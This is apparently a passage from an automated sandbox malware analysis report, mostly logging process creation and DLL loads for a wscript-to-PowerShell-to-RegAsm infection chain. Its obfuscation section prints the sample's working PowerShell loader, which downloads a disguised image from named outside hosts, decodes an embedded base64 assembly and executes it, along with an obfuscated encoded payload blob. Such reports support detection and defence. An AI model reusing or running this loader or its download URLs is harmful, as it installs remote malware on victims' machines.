-ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

              Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Network");IWshNetwork2.ComputerName();IWshShell3.Run("powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#", "0")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: $codigo = '[obfuscated payload blob omitted]'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '[obfuscated payload blob omitted]'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#
